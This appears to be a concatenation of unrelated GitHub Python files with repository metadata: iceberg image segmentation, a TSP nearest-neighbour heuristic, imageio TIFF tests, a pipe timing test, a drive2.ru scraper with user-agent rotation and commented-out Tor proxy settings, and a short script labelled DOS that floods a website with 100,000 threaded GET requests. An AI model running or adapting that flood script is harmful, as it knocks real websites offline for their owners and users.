# performs image segmentation. For each it produces a npz file that contains
# the total number of pixels (npixels), an array with the area of each
# individual iceberg (icebergArea), the pixel size (pixArea), and the edges
# of the icebergs (edges) for plotting purposes. It also produces a figure
# to show the results of the image segmentation.
import numpy as np
from matplotlib import pyplot as plt
import matplotlib
import cv2
import glob
import os
from scipy.ndimage.filters import gaussian_filter
import multiprocessing as mp
import timeit
import shapefile
from shapely.geometry import Polygon, Point
plt.ioff()
#%%
def findIcebergs(input_file):
# https://machinelearningknowledge.ai/image-segmentation-in-python-opencv/
print('Processing image ' + os.path.basename(input_file))
img = cv2.imread(input_file)
# use value
hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
_, _, img = cv2.split(hsv)
# smooth to remove small icebergs and whitecaps
img = cv2.GaussianBlur(img,(11,11),0)
npixels = img.shape[0]*img.shape[1] # store total number of pixels; later store number of pixels in each iceberg
aspect_ratio = float(img.shape[0])/img.shape[1]
with open(input_file[:-3] + 'jgw') as f:
pixArea = f.readline().rstrip() # find area of pixel for each image
pixArea = (np.array(pixArea,dtype='float32'))**2
f.close()
if np.max(img) > 200: # image contains icebergs!
# enhance contrast by stretching the image PROBLEM IF NO ICEBERGS!!
img = cv2.normalize(img, None, alpha=0, beta=255, norm_type=cv2.NORM_MINMAX, dtype=cv2.CV_32F).astype('uint8')
# add border to image to detect icebergs along the boundary
bordersize=1
img = cv2.copyMakeBorder(img, top=bordersize, bottom=bordersize,
left=bordersize, right=bordersize, borderType=cv2.BORDER_CONSTANT, value=0 )
# threshold image
_, img_ = cv2.threshold(img, 170, 255, cv2.THRESH_BINARY)
#_, img_ = cv2.threshold(img,40,255, cv2.THRESH_BINARY)
## segment using cluster detection, using canny edge detection
# find edges
edges = cv2.dilate(cv2.Canny(img_,0,255),None)
# detect contours: only external contours, and keep all points along contours
_, contours, _ = cv2.findContours(edges.copy(),cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)
# remove holes; this command no longer seems necessary?
#contours = [contours[i] for i in range(len(contours)) if hierarchy[0][i][3] < 0]
# fill contours on original image
cv2.drawContours(img, contours, contourIdx=-1, color=(255,255,255),thickness=-1).astype('float32')
# calculate area of icebergs
icebergArea = np.zeros(len(contours))
for k in range(len(icebergArea)):
icebergArea[k] = cv2.contourArea(contours[k])
else: # create empty arrays if no icebergs are found
icebergArea = []
edges = []
photo_dir = os.path.dirname(input_file)
processed_directory = photo_dir + '/processed/'
np.savez(processed_directory + '/' + os.path.basename(input_file)[:-4] + '_icebergs.npz', npixels=npixels, icebergArea=icebergArea, pixArea=pixArea, edges=edges)
plt.figure(figsize=(15,15*aspect_ratio))
ax = plt.axes([0,0,1,1])
img = cv2.imread(input_file)
RGB_img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
ax.imshow(RGB_img)
if np.sum(icebergArea)>0: # if contains icebergs, plot the edges using a map of the edges (instead of the vectors)
edges_plot = edges[1:-1,1:-1].astype('float32')
edges_plot[edges_plot==0] = np.nan
ax.imshow(edges_plot)
ax.axis('off')
plt.savefig(processed_directory + '/' + os.path.basename(input_file)[:-4] + '_icebergs.jpg',format='jpg',dpi=300)
plt.close()
#%%
def main():
fjord = shapefile.Reader('./data/fjord_outline_copy.shp')
fjord = fjord.shapeRecords()[0]
fjord_polygon = Polygon(fjord.shape.points)
campaign_shapefiles = sorted(glob.glob('../HARBORSEAL_' + year + '/footprints/*.shp'))
input_files_all = [] # input files for all campaigns during the year
for j in np.arange(0,len(campaign_shapefiles)):
campaign = campaign_shapefiles[j][-22:-14]
photo_dir = glob.glob('../HARBORSEAL_' + year + '/JHI/' + campaign + '/*' + campaign + '_photo/')[0]
processed_directory = photo_dir + 'processed/'
if not os.path.isdir(processed_directory):
os.mkdir(processed_directory)
# footprints of all photos from that campaign
footprints = shapefile.Reader(campaign_shapefiles[j])
if os.path.exists(photo_dir + '/input_files.npy'):
input_files = np.load(photo_dir + '/input_files.npy').tolist()
else:
input_files = []
for k in np.arange(0,footprints.numRecords):
photo = footprints.shapeRecords()[k] # extract footprint from individual photo
if int(year)<2018:
photo_name = photo.record[1] # extract name of individual photo
else:
photo_name = photo.record[0] # extract name of individual photo
# seems to be different format for photo.record for older photos
photo_polygon = Polygon(photo.shape.points) # get polygon boundary
infjord = fjord_polygon.contains(photo_polygon) # is photo completely within the fjord?
if infjord==True:
input_files = input_files + [photo_dir + photo_name]
np.save(photo_dir + '/input_files.npy', input_files)
input_files_all = input_files_all + input_files
print('Number of files to process: ' + str(len(input_files_all)))
pool = mp.Pool(mp.cpu_count()-1)
pool.map(findIcebergs, input_files_all)
#%%
if __name__ == '__main__':
start_time = timeit.default_timer()
year = '2008' # only processes one year at a time
main()
elapsed = timeit.default_timer() - start_time
print('Elapsed time: ' + str(elapsed/60) + ' min')
| ojiving/iceberg_segmentation | s1_image_segmentation_parallel_with_shapefiles.py | s1_image_segmentation_parallel_with_shapefiles.py | py | 6,975 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "matplotlib.pyplot.ioff",
"line_number": 35,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 35,
"usage_type": "name"
},
{
"api_name": "os.path.basename",
"line_number": 43,
"usage_type": "call"
},
{
"api_name": "os.path",
... |
3866986259 | # -*- coding: utf-8 -*-
"""
Created on Wed Dec 16 20:47:36 2020
@author: mixmp
"""
import random
import math
import numpy as np
import mpmath
def nearest_neighbour_for_TPS(path):
###################function for reading the tps document########################33
def read_tps(path):
with open(path, 'r') as f:
content = f.read().splitlines()#content is a list whose every element contains every line
#line of the txt document
cleaned = [x.lstrip() for x in content if x != ""]#The gaps that exist at the start of every element
#are removed
for element in cleaned:#I find the line which strats with ΝΑΜΕ word and then
#I take the name of the problem
if element.startswith("NAME"):
a=element
if len(a.split())==2:#this happens when : is next to the word NAME
name=a.split()[1]
elif len(a.split())==3:#this happens when there is a gap between ΝΑΜΕ and :
name=a.split()[2]
i=0
flag=False
while flag==False:
if cleaned[i]=="NODE_COORD_SECTION" or cleaned[i]=="DISPLAY_DATA_SECTION":
loc=i#loc is the number of the row of the txt doument where it is written NODE_COORD_SECTION or
#NODE_COORD_SECTION and after this line there are the coordinates of the problem up to
#the line where it is written EOF
flag=True
i=i+1
cleaned1=[]#A list where I save the lines of the txt document which contain the coordinates after
#having applied split method to every line
for i in range((loc+1),(len(cleaned)-1)):
cleaned1.append(cleaned[i].split())
for element in cleaned:#I find the line which strats with DIMENSION word and then
#I take the number after the DIMENSION
if element.startswith("DIMENSION"):
a=element
if len(a.split())==2:#this happens when : is next to the word DIMENSION
dimension=int(a.split()[1])
elif len(a.split())==3:#this happens when there is a gap between DIMENSION and :
dimension=int(a.split()[2])
for element in cleaned:
if element.startswith("EDGE_WEIGHT_TYPE"):
a=element
if len(a.split())==2:#this happens when : is next to EDGE_WEIGHT_TYPE
EDGE_WEIGHT_TYPE=a.split()[1]
elif len(a.split())==3:#this happens when there is a gap between EDGE_WEIGHT_TYPE and :
EDGE_WEIGHT_TYPE=a.split()[2]
coordinates=[]
coordinates1=[]
for i in cleaned1:
coordinates.append((int(i[0]),float(i[1]),float(i[2])))#coordinates is a list which contains the id
#number and dimensions of every point
coordinates1.append((float(i[1]),float(i[2])))#coordinates is a list which contains
#the dimensions of every point
#dimension=len(cleaned)-(loc+1)-1#A second way to find the dimensions of the problem
##########In the following lines I compute for every pair of points, the distance of them
##########and I create a nxn matrix which contains the distance of every 2 points of the problem
##########The type of the distance is given by the edge weight type
if EDGE_WEIGHT_TYPE== "EUC_2D":
##EDGE_WEIGHT_TYPE : EUC_2D
n=len(coordinates1)
dist = np.zeros((n,n))
for p in range(n):
for q in range(p + 1, n):
d = math.sqrt((coordinates1[p][0]-coordinates1[q][0])**2 + (coordinates1[p][1]-coordinates1[q][1])**2)
dist[p][q] = d
dist[q][p] = d
if EDGE_WEIGHT_TYPE== "ATT":
#EDGE_WEIGHT_TYPE : ATT
###ATT distance
n=len(coordinates1)
dist= np.zeros((n,n))
for p in range(n):
for q in range(p + 1, n):
d1 = math.sqrt(((coordinates1[p][0]-coordinates1[q][0])**2 + (coordinates1[p][1]-coordinates1[q][1])**2)/10)
d2=mpmath.nint(d1)
if d2<d1:
d=d2+1
else:
d=d2
dist[p][q] = d
dist[q][p] = d
if EDGE_WEIGHT_TYPE== "GEO":
#EDGE_WEIGHT_TYPE : GEO
n=len(coordinates1)
dist = np.zeros((n,n))
for p in range(n):
for q in range(p + 1, n):
PI = math.pi;
deg =mpmath.nint(coordinates1[p][0]);
min = coordinates1[p][0] - deg;
latitude_p= PI * (deg + 5.0 * min / 3.0 ) / 180.0
deg = mpmath.nint( coordinates1[p][1] );
min = coordinates1[p][1] - deg;
longitude_p = PI * (deg + 5.0 * min / 3.0 ) / 180.0
deg = mpmath.nint(coordinates1[q][0]);
min = coordinates1[q][0] - deg;
latitude_q= PI * (deg + 5.0 * min / 3.0 ) / 180.0
deg = mpmath.nint( coordinates1[q][1] );
min = coordinates1[q][1] - deg;
longitude_q = PI * (deg + 5.0 * min / 3.0 ) / 180.0
RRR = 6378.388;
q1 = math.cos( longitude_p - longitude_q );
q2 = math.cos( latitude_p - latitude_q );
q3 = math.cos( latitude_p + latitude_q );
d = int(( RRR * math.acos( 0.5*((1.0+q1)*q2 - (1.0-q1)*q3) ) + 1.0))
dist[p][q] = d
dist[q][p] = d
return cleaned,cleaned1,dimension,coordinates1,coordinates,EDGE_WEIGHT_TYPE,dist,name
######################################################################################
##loading the tps document
file_read=read_tps(path)
coordinates=file_read[3]
dimension=file_read[2]
name=file_read[7]
dist=file_read[6]
###############dist is the matrix which contains the distances between all the pairs of nodes
EDGE_WEIGHT_TYPE=file_read[5]
############################Nearest Neighbor algorithm
def nearest_neighbour(dist_matrix):
n=dist_matrix.shape[0]#the total number of the nodes of the problem
start=random.choice(list(range(n)))#random selection between all the nodes for the starting node
not_visited=list(range(n))#at first all the nodes are not visited, so at first I create
#the not_visited list as a sequence of all nodes of the problem
path=[start]#the first node of the path is the initial node-start
not_visited=[ele for ele in not_visited if ele not in path]#taking out from not_visited list
#the elemnts of the path, beacause they are already visited
cost=0
#the repetition continues until the no_visited list is empty(its length is zero),
#which means that every node of the problem is visited
while len(not_visited)>0:
last=path[-1]#last is the last visited node in the path
next_loc_index=np.argmin(dist_matrix[last][not_visited])
#the index for the next node that will be visited is computed by finding which node from the
#nodes that are not visited has the minimum distance from the last visited node.
#next_loc_index contains the index for that node
next_loc=not_visited[next_loc_index]#next_loc is the next node that will be visited
min_dist=dist_matrix[last][next_loc]#minimum distance from the previous visited node to the next
#viisited node
path.append(next_loc)#adding the current visited node to the end of the path list
not_visited=[ele for ele in not_visited if ele not in path]#taking out of the not_visited lsit
#the node that is just visited and added to the path list
cost+=min_dist#each time the minimum distance from the previous visited node to the next
#viisited node is added to cost
cost+=dist_matrix[path[-1]][start]# at the end the distance from the last visited node to the
#initial node is added to the cost as the process is cyclical and we should
#return to the start node
path.append(start)
return path, cost,start
nn_alg=nearest_neighbour(dist)
path=nn_alg[0]
cost=nn_alg[1]
start=nn_alg[2]
print("The randomly chosen starting node is",start)
print("\n")
print("A short rout computed by nearest neighbour heuristic for",name,"TSP problem is:")
print("\n")
print(path)
print("\n")
print("The total cost of this rout is:",cost)
return
##################applying nearest_neighbour_for_TPS function to TSP problems
nearest_neighbour_for_TPS("berlin52.txt")
nearest_neighbour_for_TPS("burma14.txt")
nearest_neighbour_for_TPS("pr144.txt")
nearest_neighbour_for_TPS("a280.txt") | michaelampalkoudi/Master-projects | HW_9_Computational_optimization.py | HW_9_Computational_optimization.py | py | 8,857 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.zeros",
"line_number": 74,
"usage_type": "call"
},
{
"api_name": "math.sqrt",
"line_number": 77,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 85,
"usage_type": "call"
},
{
"api_name": "math.sqrt",
"line_number": 88,
... |
73157455464 | """ Test tifffile plugin functionality.
"""
import datetime
import io
import warnings
from copy import deepcopy
import numpy as np
import pytest
from conftest import deprecated_test
import imageio.v2 as iio
import imageio.v3 as iio3
from imageio.config import known_extensions, known_plugins
tifffile = pytest.importorskip("tifffile", reason="tifffile is not installed")
@pytest.fixture(scope="module", autouse=True)
def use_tifffile_v3():
plugin_name = "TIFF"
all_plugins = known_plugins.copy()
all_extensions = known_extensions.copy()
known_plugins.clear()
known_extensions.clear()
known_plugins[plugin_name] = all_plugins[plugin_name]
for extension, configs in all_extensions.items():
for config in configs:
for plugin in config.priority:
if plugin == plugin_name:
copied_config = deepcopy(config)
copied_config.priority = [plugin_name]
copied_config.default_priority = [plugin_name]
known_extensions[extension] = [copied_config]
yield
known_plugins.update(all_plugins)
known_extensions.update(all_extensions)
@deprecated_test
def test_tifffile_format():
# Test selection
for name in ["tiff", ".tif"]:
format = iio.formats[name]
assert format.name == "TIFF"
def test_tifffile_reading_writing(test_images, tmp_path):
"""Test reading and saving tiff"""
im2 = np.ones((10, 10, 3), np.uint8) * 2
filename1 = tmp_path / "test_tiff.tiff"
# One image
iio.imsave(filename1, im2)
im = iio.imread(filename1)
ims = iio.mimread(filename1)
assert im.shape == im2.shape
assert (im == im2).all()
assert len(ims) == 1
# Multiple images
iio.mimsave(filename1, [im2, im2, im2])
im = iio.imread(filename1)
ims = iio.mimread(filename1)
assert im.shape == im2.shape
assert (im == im2).all() # note: this does not imply that the shape match!
assert len(ims) == 3
for i in range(3):
assert ims[i].shape == im2.shape
assert (ims[i] == im2).all()
# volumetric data
iio.volwrite(filename1, np.tile(im2, (3, 1, 1, 1)))
vol = iio.volread(filename1)
vols = iio.mvolread(filename1)
assert vol.shape == (3,) + im2.shape
assert len(vols) == 1 and vol.shape == vols[0].shape
for i in range(3):
assert (vol[i] == im2).all()
# remote channel-first volume rgb (2, 3, 10, 10)
filename2 = test_images / "multipage_rgb.tif"
img = iio.mimread(filename2)
assert len(img) == 2
assert img[0].shape == (3, 10, 10)
# Mixed
W = iio.save(filename1)
W.set_meta_data({"planarconfig": "SEPARATE"}) # was "planar"
assert W.format.name == "TIFF"
W.append_data(im2)
W.append_data(im2)
W.close()
#
R = iio.read(filename1)
assert R.format.name == "TIFF"
ims = list(R) # == [im for im in R]
assert (ims[0] == im2).all()
# meta = R.get_meta_data()
# assert meta['orientation'] == 'top_left' # not there in later version
# Fail
with pytest.raises(IndexError):
R.get_data(-1)
with pytest.raises(IndexError):
R.get_data(3)
# Ensure imread + imwrite works round trip
filename3 = tmp_path / "test_tiff2.tiff"
im1 = iio.imread(filename1)
iio.imwrite(filename3, im1)
im3 = iio.imread(filename3)
assert im1.ndim == 3
assert im1.shape == im3.shape
assert (im1 == im3).all()
# Ensure imread + imwrite works round trip - volume like
filename3 = tmp_path / "test_tiff2.tiff"
im1 = np.stack(iio.mimread(filename1))
iio.volwrite(filename3, im1)
im3 = iio.volread(filename3)
assert im1.ndim == 4
assert im1.shape == im3.shape
assert (im1 == im3).all()
# Read metadata
md = iio.get_reader(filename2).get_meta_data()
assert not md["is_imagej"]
assert md["description"] == "shape=(2,3,10,10)"
assert md["description1"] == ""
assert md["datetime"] == datetime.datetime(2015, 5, 9, 9, 8, 29)
assert md["software"] == "tifffile.py"
# Write metadata
dt = datetime.datetime(2018, 8, 6, 15, 35, 5)
with iio.get_writer(filename1, software="testsoftware") as w:
w.append_data(
np.zeros((10, 10)), meta={"description": "test desc", "datetime": dt}
)
w.append_data(np.zeros((10, 10)), meta={"description": "another desc"})
with iio.get_reader(filename1) as r:
for md in r.get_meta_data(), r.get_meta_data(0):
assert "datetime" in md
assert md["datetime"] == dt
assert "software" in md
assert md["software"] == "testsoftware"
assert "description" in md
assert md["description"] == "test desc"
md = r.get_meta_data(1)
assert "description" in md
assert md["description"] == "another desc"
def test_imagej_hyperstack(tmp_path):
# create artifical hyperstack
tifffile.imwrite(
tmp_path / "hyperstack.tiff",
np.zeros((15, 2, 180, 183), dtype=np.uint8),
imagej=True,
)
# test ImageIO plugin
img = iio.volread(tmp_path / "hyperstack.tiff", format="TIFF")
assert img.shape == (15, 2, 180, 183)
@pytest.mark.parametrize(
"dpi,expected_resolution",
[
((0, 1), (0, 1, "INCH")),
((0, 12), (0, 12, "INCH")),
((100, 200), (100, 200, "INCH")),
((0.5, 0.5), (0.5, 0.5, "INCH")),
(((1, 3), (1, 3)), (1 / 3, 1 / 3, "INCH")),
],
)
def test_resolution_metadata(tmp_path, dpi, expected_resolution):
data = np.zeros((200, 100), dtype=np.uint8)
writer = iio.get_writer(tmp_path / "test.tif")
writer.append_data(data, dict(resolution=dpi))
writer.close()
read_image = iio.imread(tmp_path / "test.tif")
assert read_image.meta["resolution"] == expected_resolution
assert read_image.meta["resolution_unit"] == 2
@pytest.mark.parametrize("resolution", [(1, 0), (0, 0)])
def test_invalid_resolution_metadata(tmp_path, resolution):
data = np.zeros((200, 100), dtype=np.uint8)
tif_path = tmp_path / "test.tif"
writer = iio.get_writer(tif_path)
writer.append_data(data)
writer.close()
# Overwrite low level metadata the exact way we want it
# to avoid any re-interpretation of the metadata by imageio
# For example, it seems that (0, 0) gets rewritten as (0, 1)
with tifffile.TiffFile(tif_path, mode="r+b") as tif:
tags = tif.pages[0].tags
tags["XResolution"].overwrite(resolution)
tags["YResolution"].overwrite(resolution)
# Validate with low level library that the invalid metadata is written
with tifffile.TiffFile(tif_path, mode="rb") as tif:
tags = tif.pages[0].tags
assert tags["XResolution"].value == resolution
assert tags["YResolution"].value == resolution
with pytest.warns(RuntimeWarning):
read_image = iio.imread(tmp_path / "test.tif")
assert "resolution" not in read_image.meta
def test_read_bytes():
# regression test for: https://github.com/imageio/imageio/issues/703
some_bytes = iio.imwrite("<bytes>", [[0]], format="tiff")
assert some_bytes is not None
def test_write_file(tmp_path):
# regression test for
# https://github.com/imageio/imageio/issues/810
img = np.zeros((32, 32), dtype=np.uint16)
iio3.imwrite(tmp_path / "v.tif", img)
def test_stk_volume(test_images):
# this is a regression test for
# https://github.com/imageio/imageio/issues/802
expected = iio.volread(test_images / "movie.stk")
actual = iio3.imread(test_images / "movie.stk")
np.allclose(actual, expected)
def test_tiff_page_writing():
# regression test for
# https://github.com/imageio/imageio/issues/849
base_image = np.full((256, 256, 3), 42, dtype=np.uint8)
buffer = io.BytesIO()
iio3.imwrite(buffer, base_image, extension=".tiff")
buffer.seek(0)
with tifffile.TiffFile(buffer) as file:
assert len(file.pages) == 1
def test_bool_writing():
# regression test for
# https://github.com/imageio/imageio/issues/852
expected = (np.arange(255 * 123) % 2 == 0).reshape((255, 123))
img_bytes = iio3.imwrite("<bytes>", expected, extension=".tiff")
actual = iio.imread(img_bytes)
assert np.allclose(actual, expected)
def test_roundtrip(tmp_path):
# regression test for
# https://github.com/imageio/imageio/issues/854
iio3.imwrite(tmp_path / "test.tiff", np.ones((10, 64, 64), "u4"))
actual = iio3.imread(tmp_path / "test.tiff")
assert actual.shape == (10, 64, 64)
def test_volume_roudtrip(tmp_path):
# regression test for
# https://github.com/imageio/imageio/issues/818
expected_volume = np.full((23, 123, 456, 3), 42, dtype=np.uint8)
iio3.imwrite(tmp_path / "volume.tiff", expected_volume)
# assert that the file indeed contains a volume
with tifffile.TiffFile(tmp_path / "volume.tiff") as file:
assert file.series[0].shape == (23, 123, 456, 3)
assert len(file.series) == 1
actual_volume = iio3.imread(tmp_path / "volume.tiff")
assert np.allclose(actual_volume, expected_volume)
def test_multipage_read(tmp_path):
# regression test for
# https://github.com/imageio/imageio/issues/818
# this creates a TIFF with two flat images (non-volumetric)
# Note: our plugin currently can't do this, but tifffile itself can
expected_flat = np.full((35, 73, 3), 114, dtype=np.uint8)
with tifffile.TiffWriter(tmp_path / "flat.tiff") as file:
file.write(expected_flat)
file.write(expected_flat)
actual_flat = iio3.imread(tmp_path / "flat.tiff")
assert np.allclose(actual_flat, expected_flat)
for idx, page in enumerate(iio3.imiter(tmp_path / "flat.tiff")):
assert np.allclose(page, expected_flat)
assert idx == 1
def test_multiple_ndimages(tmp_path):
volumetric = np.full((4, 255, 255, 3), 114, dtype=np.uint8)
flat = np.full((255, 255, 3), 114, dtype=np.uint8)
different_shape = np.full((120, 73, 3), 114, dtype=np.uint8)
with tifffile.TiffWriter(tmp_path / "nightmare.tiff") as file:
file.write(volumetric)
file.write(flat)
file.write(different_shape)
# imread will read the image at the respective index
assert iio3.imread(tmp_path / "nightmare.tiff", index=0).shape == (4, 255, 255, 3)
assert iio3.imread(tmp_path / "nightmare.tiff", index=1).shape == (255, 255, 3)
assert iio3.imread(tmp_path / "nightmare.tiff", index=2).shape == (120, 73, 3)
# imiter will yield the three images in order
shapes = [(4, 255, 255, 3), (255, 255, 3), (120, 73, 3)]
for image, shape in zip(iio3.imiter(tmp_path / "nightmare.tiff"), shapes):
assert image.shape == shape
def test_compression(tmp_path):
img = np.ones((128, 128))
with warnings.catch_warnings():
warnings.simplefilter("ignore")
iio.imwrite(tmp_path / "test.tiff", img, metadata={"compress": 5})
with tifffile.TiffFile(tmp_path / "test.tiff") as file:
# this should be tifffile.COMPRESSION.ADOBE_DEFLATE
# but that isn't supported by tifffile on python 3.7
assert file.pages[0].compression == 8
print("")
iio.imwrite(tmp_path / "test.tiff", img, metadata={"compression": "zlib"})
with tifffile.TiffFile(tmp_path / "test.tiff") as file:
# this should be tifffile.COMPRESSION.ADOBE_DEFLATE
# but that isn't supported by tifffile on python 3.7
assert file.pages[0].compression == 8
print("")
iio.imwrite(
tmp_path / "test.tiff",
img,
)
with tifffile.TiffFile(tmp_path / "test.tiff") as file:
# this should be tifffile.COMPRESSION.NONE
# but that isn't supported by tifffile on python 3.7
assert file.pages[0].compression == 1
| imageio/imageio | tests/test_tifffile.py | test_tifffile.py | py | 11,873 | python | en | code | 1,339 | github-code | 36 | [
{
"api_name": "pytest.importorskip",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "imageio.config.known_plugins.copy",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "imageio.config.known_plugins",
"line_number": 23,
"usage_type": "name"
},
{
... |
43328947226 | from bs4 import BeautifulSoup
#from requests import Session as R
import requests as R
import time
import random
import os
import json
from fake_useragent import UserAgent
from stem import Signal
from stem.control import Controller
from selenium import webdriver
from selenium.webdriver.firefox.options import Options
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
class DATA(object):
def __init__(self):
self.file = {}
self.csv = "";
def parseCSV(self):
with open(self.csv, 'r') as g:
for gh in g.readlines():
gh = gh.split('\n')[0].split(';')
try:
list = self.file[gh[0]]
if gh[1] != 'no_matching_images':
convRUC = [int(i) for i in gh[1].split(':')[1].split('/')]
list.append(convRUC)
self.file[gh[0]] = list
else:
list.append([])
self.file[gh[0]] = list
except KeyError:
pass
def parseIMG(self, dir_name, tp):
path = "data/"+dir_name
print ("PARSING",path)
valid_images = [".jpg",".png"]
for r, d, f in os.walk(path):
for ix, file in enumerate(f):
if valid_images[0] in file or valid_images[1] in file:
if int(tp) == 4:
self.file[file.split(".")[0]] = [os.path.join(r, file)]
else:
self.file[os.path.join(r, file)] = [os.path.join(r, file)]
if ".csv" in file:
self.csv = os.path.join(r, file)
path_img = "data_img/"
def create_dir(x):
x = x.split("/")
#try:
x1 = path_img+x[2]
try:
os.mkdir(x1)
except FileExistsError:
pass
x2 = x1+"/"+x[3]
try:
os.mkdir(x2)
except FileExistsError:
pass
x3 = x2+"/"+x[4]
try:
os.mkdir(x3)
except FileExistsError:
pass
#except:
#print (x[2], x[3], x[4])
return x3
#os.mkdir(car_info.text)
#---------------------------------------_>
class RequestLib():
def __init__(self):
self.session = R.session()
self.session.proxies = {}
#self.session.proxies['http'] = 'socks5://127.0.0.1:9050'
#self.session.proxies['https'] = 'socks5://127.0.0.1:9050'
self.headers = {}
self.headers['User-agent'] = UserAgent().random
self.headers['Accept-Language'] = "en,en-US;q=0,5"
self.headers['Content-Type'] = "application/x-www-form-urlencoded"
self.headers['Connection'] = "keep-alive"
self.headers['Accept'] = "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8"
def get(self, http):
#print (http)
self.headers['User-agent'] = UserAgent().random
get_page = self.session.get(http, headers=self.headers)#, timeout=(10, 10))
return get_page#.text
Sess = RequestLib()
#---------------------------------------_>
def my_proxy(PROXY_HOST,PROXY_PORT):
fp = webdriver.FirefoxProfile()
#fp.set_preference("network.proxy.type", 1)
#fp.set_preference("network.proxy.socks",PROXY_HOST)
#fp.set_preference("network.proxy.socks_port",int(PROXY_PORT))
fp.update_preferences()
options = Options()
#options.add_argument('headless')
options.add_argument("--headless")
#options.headless = True
return webdriver.Firefox(options=options, firefox_profile=fp)
def scroll():
last_height = proxy.execute_script("return document.body.scrollHeight")
w = last_height//100
igg = 100
for i in range(w):
proxy.execute_script("window.scrollTo(0, {})".format(igg))
time.sleep(0.3)
igg += 100
proxy = my_proxy("127.0.0.1", 9050)
path = "data"
def func_(htt, dir_save):
#p_parse = Sess.get(htt)
#soup = BeautifulSoup(p_parse.text)
proxy.get(htt)
try:
#element = WebDriverWait(proxy, 10).until(EC.presence_of_element_located((By.CLASS_NAME, "l-body")))
scroll()
finally:
pass
def PP():
html = proxy.page_source
soup = BeautifulSoup(html)
car_info = soup.find("span",{"class":"u-break-word"})
car_rate = soup.find("span",{"class":"r-button-unstyled c-round-num-block"})
car_rate = car_rate.find("strong")
user_info = soup.find("div",{"class":"c-user-card__info"})
user_link = soup.find("a",{"class":"c-link c-link--color00 c-username c-username--wrap"})
#print (user_link["href"])#(car_info.text, car_rate.text)#, user_info.text)
f_inf = open(dir_save+"/info.txt", "w")
f_inf.write(car_info.text+";"+car_rate.text+"\n")
f_inf.write(user_link["href"]+"\n")
f_inf.write(user_info.text+"\n")
f_inf.close()
cl = soup.find_all('div', {"class": "c-slideshow__hd"})
for K in cl:
Kcl = K.find("img")
#print (Kcl["src"], Kcl["src"].split("/")[-1])
response = Sess.get(htt)#R.get(Kcl["src"], headers=headers)
print (response)
if response.status_code == 200:
with open(dir_save+"/"+Kcl["src"].split("/")[-1], 'wb') as fli:
fli.write(response.content)
#else:
#cl = PP() #func_(htt, dir_save)
SEC = random.choice([2,3,4,5,3,1,1.1,1.5, 0.7])
time.sleep(SEC)
PP()
dirn = os.walk(path)
ls = ["bmw","mercedes","audi","opel","landrover","mitsubishi","nissan","subaru","toyota","porsche","ferrari","lamborghini"]#"bmw",
for U in dirn:
for P in U[2]:
fl = [os.path.join(U[0], P)]
#print (fl)
OP = open(fl[0],"r")
lS = OP.readlines()
for st in lS:
htt = "https://www.drive2.ru"+st.split("\n")[0]
dir_save = create_dir(st.split("\n")[0])
if st.split("/")[2] in ls:
print (htt, st.split("/")[-2])
func_(htt, dir_save)
#try:
# func_(htt, dir_save)
# p_parse = Sess.get(htt)
# soup = BeautifulSoup(p_parse.text)
#
# car_info = soup.find("span",{"class":"u-break-word"})
# car_rate = soup.find("span",{"class":"r-button-unstyled c-round-num-block"})
#
# car_rate = car_rate.find("strong")
# user_info = soup.find("div",{"class":"c-user-card__info"})
# user_link = soup.find("a",{"class":"c-link c-link--color00 c-username c-username--wrap"})
# #print (user_link["href"])#(car_info.text, car_rate.text)#, user_info.text)
#
# f_inf = open(dir_save+"/info.txt", "w")
# f_inf.write(car_info.text+";"+car_rate.text+"\n")
# f_inf.write(user_link["href"]+"\n")
# f_inf.write(user_info.text+"\n")
# f_inf.close()
#
# cl = soup.find_all('div', {"class": "c-slideshow__hd"})
# for K in cl:
# Kcl = K.find("img")
# print (Kcl["src"], Kcl["src"].split("/")[-1])
# response = R.get(Kcl["src"], headers=headers)
# print (response)
# if response.status_code == 200:
# with open(dir_save+"/"+Kcl["src"].split("/")[-1], 'wb') as fli:
# fli.write(response.content)
# SEC = random.choice([2,3,4,5,3,1,1.1,1.5, 0.7])
# time.sleep(SEC)
#except:
#print (htt)
#pass
#func_(htt, dir_save)
#print (dirn)
| naturalkind/simpleparsing | build_parse_drive2/dr4_1.py | dr4_1.py | py | 9,278 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.walk",
"line_number": 44,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 48,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 48,
"usage_type": "attribute"
},
{
"api_name": "os.path.join",
"line_number": 5... |
1952962326 | from multiprocessing import Process,Queue,Pipe
from slave import serialize
import time
def timer(*args, f=None):
before = time.time()
f(*args)
after = time.time()
return after - before
big_str = ' '.join(['abcdeftghijklmnopq\n' for y in range(1000000)]) + ' '
print(len(big_str))
parent_conn,child_conn = Pipe()
p = Process(target=serialize, args=(child_conn,big_str))
def run(proc, conn):
proc.start()
conn.recv()
print(timer(p, parent_conn, f=run))
| brokenpath/generator | master.py | master.py | py | 484 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "time.time",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "time.time",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "multiprocessing.Pipe",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "multiprocessing.Process",
... |
36189547346 | from concurrent.futures.thread import ThreadPoolExecutor
import requests
# url = "http://www.eversunshine.cn/"
# url = "https://static-4c89007f-af34-418a-909e-be456bf03b70.bspapp.com/#/"
# url = "https://www.baidu.com/"
def DOS():
# resp = requests.get(url, timeout=3)
# print(resp.text)
# print(data)
resp = requests.get(url)
print(resp.text)
if __name__ == "__main__":
with ThreadPoolExecutor(1000) as t:
for i in range(100000):
t.submit(DOS)
